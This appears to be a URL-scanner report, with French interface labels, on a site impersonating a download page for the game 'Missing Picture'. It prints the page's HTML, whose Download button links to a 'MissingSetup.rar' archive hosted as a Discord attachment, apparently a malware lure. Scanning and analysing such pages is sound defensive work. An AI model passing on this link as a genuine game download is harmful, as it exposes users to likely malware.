- ID de l'analyse :
- 37fbfc03-4c8e-4f8f-afcd-acc0ae6bdf07Terminée
- URL soumise :
- https://missing-picture.com/Redirigé
- Fin du rapport :
Liens : 1 trouvé(s)
Liens sortants identifiés à partir de la page
Lien | texte |
---|---|
https://cdn.discordapp.com/attachments/1305290320740745289/1310327563394089011/MissingSetup.rar?ex=6744d123&is=67437fa3&hm=1939210d3e6b0b5ae22ca380dad66c1237dbbe7945c147ce96f7c8c29a414f12& | Download |
Variables JavaScript : 4 trouvée(s)
Les variables JavaScript globales chargées dans l'objet fenêtre d'une page sont des variables déclarées en dehors des fonctions et accessibles depuis n'importe quel endroit du code au sein du champ d'application actuel
Nom | Type |
---|---|
0 | object |
onbeforetoggle | object |
documentPictureInPicture | object |
onscrollend | object |
Messages de journal de console : 1 trouvé(s)
Messages consignés dans la console web
Type | Catégorie | Enregistrement |
---|---|---|
error | network |
|
HTML
Le corps HTML de la page en données brutes
<!DOCTYPE html><html lang="en"><head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Missing Picture</title>
<link href="https://fonts.googleapis.com/css2?family=Orbitron:wght@500;700&family=Roboto:wght@400;500&display=swap" rel="stylesheet">
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
}
body {
font-family: 'Roboto', sans-serif;
background: linear-gradient(135deg, #1e1e1e, #333);
color: #fff;
min-height: 100vh;
display: flex;
justify-content: center;
align-items: center;
}
.container {
background-color: #212121;
border-radius: 15px;
max-width: 1200px;
width: 100%;
padding: 40px;
box-shadow: 0 10px 30px rgba(0, 0, 0, 0.8);
text-align: center;
}
.logo img {
width: 200px;
margin-bottom: 20px;
}
h1 {
font-family: 'Orbitron', sans-serif;
font-size: 3.5rem;
color: #FF9800;
text-transform: uppercase;
margin-bottom: 20px;
letter-spacing: 2px;
}
p {
font-size: 1.2rem;
margin-bottom: 30px;
color: #ddd;
line-height: 1.8;
}
.btn-container {
display: flex;
justify-content: center;
gap: 20px;
margin-bottom: 40px;
}
.download-btn {
display: inline-block;
padding: 15px 50px;
border-radius: 8px;
font-size: 1.2rem;
font-weight: 500;
text-transform: uppercase;
text-decoration: none;
color: #fff;
background-color: #FF9800;
transition: background-color 0.3s ease, transform 0.3s ease;
}
.download-btn:hover {
background-color: #F57C00;
transform: translateY(-5px);
box-shadow: 0 5px 20px rgba(255, 152, 0, 0.5);
}
.video-container {
margin: 40px 0;
}
iframe {
border-radius: 10px;
width: 100%;
max-width: 900px;
height: 500px;
box-shadow: 0 10px 20px rgba(0, 0, 0, 0.7);
}
.section {
margin: 50px 0;
text-align: left;
}
.section h2 {
font-family: 'Orbitron', sans-serif;
font-size: 2.5rem;
color: #FF9800;
margin-bottom: 20px;
border-bottom: 4px solid #F57C00;
display: inline-block;
}
.section ul {
list-style: none;
padding-left: 0;
}
.section ul li {
font-size: 1.3rem;
margin-bottom: 15px;
position: relative;
padding-left: 25px;
}
.section ul li::before {
content: '➤';
color: #FF9800;
position: absolute;
left: 0;
top: 0;
}
.gallery {
display: flex;
flex-wrap: wrap;
gap: 20px;
justify-content: center;
margin-top: 40px;
}
.gallery img {
width: 347px;
height: 500px;
border-radius: 10px;
box-shadow: 0 10px 20px rgba(0, 0, 0, 0.7);
transition: transform 0.3s ease;
}
.gallery img:hover {
transform: scale(1.05);
}
/* Responsividade */
@media (max-width: 768px) {
h1 {
font-size: 2.5rem;
}
p {
font-size: 1.1rem;
}
iframe {
height: 300px;
}
.section ul li {
font-size: 1.1rem;
}
.gallery img {
width: 100%;
height: auto;
}
}
</style>
</head>
<body>
<div class="container">
<div class="logo">
<img src="https://img.itch.zone/aW1nLzE2NDc1ODIxLnBuZw==/original/Hp2kIf.png" alt="Missing Picture Logo">
</div>
<h1>Missing Picture</h1>
<p>Join forces with a friend in Missing Picture. Together, explore the shadowy Swedish forests, piece together clues, and unveil the truth behind the disappearance of three teenagers.</p>
<div class="btn-container">
<a href="https://cdn.discordapp.com/attachments/1305290320740745289/1310327563394089011/MissingSetup.rar?ex=6744d123&is=67437fa3&hm=1939210d3e6b0b5ae22ca380dad66c1237dbbe7945c147ce96f7c8c29a414f12&" class="download-btn" download="">Download</a>
</div>
<div class="video-container">
<iframe src="https://www.youtube.com/embed/lElf3SAHsMU?si=eSLKdWaJXjutv5Vb" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen=""></iframe>
</div>
<div class="section gallery">
<h2>Game Gallery</h2>
<div class="gallery">
<img src="https://img.itch.zone/aW1hZ2UvMjcyNTYyNS8xNjQ3Mzk1MC5wbmc=/347x500/OXRxiX.png" alt="Gallery Image 1">
<img src="https://img.itch.zone/aW1hZ2UvMjcyNTYyNS8xNjQ0ODA3Ni5wbmc=/347x500/rUhIyb.png" alt="Gallery Image 2">
<img src="https://img.itch.zone/aW1hZ2UvMjcyNTYyNS8xNjQ0ODA3NC5wbmc=/347x500/ECrYna.png" alt="Gallery Image 3">
<img src="https://img.itch.zone/aW1hZ2UvMjcyNTYyNS8xNjQ0ODA3NS5wbmc=/347x500/zKLG1o.png" alt="Gallery Image 4">
</div>
</div>
</div>
</body></html>